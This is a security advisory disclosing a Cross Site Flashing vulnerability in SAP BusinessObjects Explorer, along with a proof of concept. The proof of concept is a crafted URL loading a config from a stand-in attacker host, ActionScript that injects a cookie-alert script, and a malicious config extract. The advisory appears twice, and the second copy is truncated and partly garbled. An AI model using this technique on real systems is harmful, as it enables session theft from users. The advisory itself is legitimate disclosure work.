############################## ############################## ###########
# http://www.csnc.ch/en/ downloads/advisories.html
############################## ############################## ###########
# Product: BusinessObjects Explorer
# Vendor: SAP AG
# Subject: Cross Site Flashing
# Risk: High
# Effect: Remotely exploitable
# Author: Stefan Horlacher
# Date: 2014-10-10
# SAP Security Note: 1908647 [0]
############################## ############################## ###########
BusinessObjects Explorer is vulnerable against Cross Site Flashing [1]
attacks, allowing an attacker to e.g. steal the victim's session.
This vulnerability requires the victim to click on a malicious link
prepared by the attacker.
SAP BusinessObjects Explorer version 14.0.5 (build 882)
Not tested:
Other versions of BusinessObjects Explorer
Technical Description:
The Flash file suffers from a Cross Site Flashing vulnerability. It
is possible to directly load and display the
com_businessobjects_polestar_ bootstrap.swf Flash file and specify a
configUrl. This requires the victim to be logged and the attacker needs
to know the /webres/ URL, which is known as soon as the attacker is in
possession of valid credentials. The configuration file specified in
the configURL parameter may reside on a foreign host. The
configuration file itself may contain URLs of further Flash files
residing on a foreign domain. If successful, the victim loads foreign
Flash files, which leads to Cross Site Flashing. The example below
loads a Flash file, which injects JavaScript into the DOM of the
originating domain.
URL: /explorer/webres/[CUT BY COMPASS]/com_businessobjects_ polestar_bootstrap.swf? configUrl=http://example.com/ attacker_flash_config.xml
Code of the injected Flash file referenced in http://example.com/attacker_ flash_config.xml
import flash.display.Sprite;
import flash.events.Event;
import flash.external. ExternalInterface;
public class Main extends Sprite
public function Main():void
ExternalInterface.call(" document.write",
"<script>alert(document. cookie)</script>");
Extract of the manipulated configuration file http://example.com/attacker_ flash_config.xml:
<p:configuration xmlns:p="http://www. businessobjects.com/2007/ platform"
<p:splashLocation p:id="com_businessobjects_ polestar_splashscreen"
p:codebase="http://[CUT BY COMPASS].csnc.ch/[CUT BY COMPASS]/"/>
<p:bundle p:id="com_businessobjects_ polestar_admin" p:codebase="http://example. com/"/>
<p:bundle p:id="com_businessobjects_ polestar_prompts" p:codebase="http://example. com/"/>
<p:bundle p:id="com_businessobjects_ polestar_dataprovider_xl" p:codebase="http://example. com/"/>
<p:bundle p:id="com_businessobjects_ polestar_portal_logoff" p:codebase="http://example. com/"/>
2013-06-06: Discovery by Stefan Horlacher
2013-06-26: Initial vendor notification
2013-12-10: Vendor releases patch and SAP Security Note 1908647
2014-10-10: Disclosure of the advisory
[0] https://service.sap.com/sap/ support/notes/1908647
[1] https://www.owasp.org/index. php/Category:OWASP_Flash_ Security_Project
# http://www.csnc.ch/en/
# Product: BusinessObjects Explorer
# Vendor: SAP AG
# Subject: Cross Site Flashing
# Risk: High
# Effect: Remotely exploitable
# Author: Stefan Horlacher
# Date: 2014-10-10
# SAP Security Note: 1908647 [0]
BusinessObjects Explorer is vulnerable against Cross Site Flashing [1]
attacks, allowing an attacker to e.g. steal the victim's session.
This vulnerability requires the victim to click on a malicious link
prepared by the attacker.
SAP BusinessObjects Explorer version 14.0.5 (build 882)
Not tested:
Other versions of BusinessObjects Explorer
Technical Description:
The Flash file suffers from a Cross Site Flashing vulnerability. It
is possible to directly load and display the
configUrl. This requires the victim to be logged and the attacker needs
to know the /webres/ URL, which is known as soon as the attacker is in
possession of valid credentials. The configuration file specified in
the configURL parameter may reside on a foreign host. The
configuration file itself may contain URLs of further Flash files
residing on a foreign domain. If successful, the victim loads foreign
Flash files, which leads to Cross Site Flashing. The example below
loads a Flash file, which injects JavaScript into the DOM of the
originating domain.
URL: /explorer/webres/[CUT BY COMPASS]/com_businessobjects_
Code of the injected Flash file referenced in http://example.com/attacker_
import flash.display.Sprite;
import flash.events.Event;
import flash.external.
public class Main extends Sprite
public function Main():void
Extract of the manipulated configuration file http://example.com/attacker_
<p:configuration xmlns:p="http://www.
<p:splashLocation p:id="com_businessobjects_
p:codebase="http://[CUT BY COMPASS].csnc.ch/[CUT BY COMPASS]/"/>
<p:bundle p:id="com_businessobjects_
<p:bundle p:id="com_businessobjects_
<p:bundle p:id="com_businessobjects_
<p:bundle p:id="com_businessobjects_
2013-06-06: Discovery by Stefan Horlacher
2013-06-26: Initial vendor notification
2013-12-10: Vendor releases patch and SAP Security Note 1908647
2014-10-10: Disclosure of the advisory
[0] https://service.sap.com/sap/
[1] https://www.owasp.org/index.